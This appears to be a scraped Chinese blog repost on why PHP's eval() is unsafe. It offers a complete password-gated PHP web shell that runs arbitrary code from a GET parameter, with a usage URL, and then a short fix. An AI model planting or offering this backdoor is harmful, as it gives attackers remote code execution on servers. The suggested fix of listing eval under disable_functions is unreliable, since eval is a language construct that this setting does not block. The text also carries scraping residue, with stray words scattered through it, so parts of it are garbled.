eval()函數不安全的緣由以及解決方案

時間 2020-01-10

原文原文鏈接

第一部分：php

分享個php eval後門程序
要求必須支持eval函數
使用方法
http://url/test.php?pwd=admin&action=eval&a=phpinfo();ide

代碼：函數

 
  <?php 
 

 
  $passwd 
  = 
  "admin" 
  ; 
  if 
  ( 
  $_GET 
  [ 
  'pwd' 
  ]!= 
  $passwd 
  ) 
  exit 
  ; 
 

 
  if 
  ( 
  $_GET 
  [ 
  'action' 
  ]== 
  "eval" 
  &&  
  $_GET 
  [ 
  'a' 
  ]){ 
  eval 
  ( 
  $_GET 
  [ 
  'a' 
  ]);} 
 

?>

第二部分：url

禁用eval()函數：spa

php.ini中找到code

disable_functions
寫成
disable_functions = phpinfo,eval     之類便可

相關標籤/搜索

每日一句

每一个你不满意的现在，都有一个你没有努力的曾经。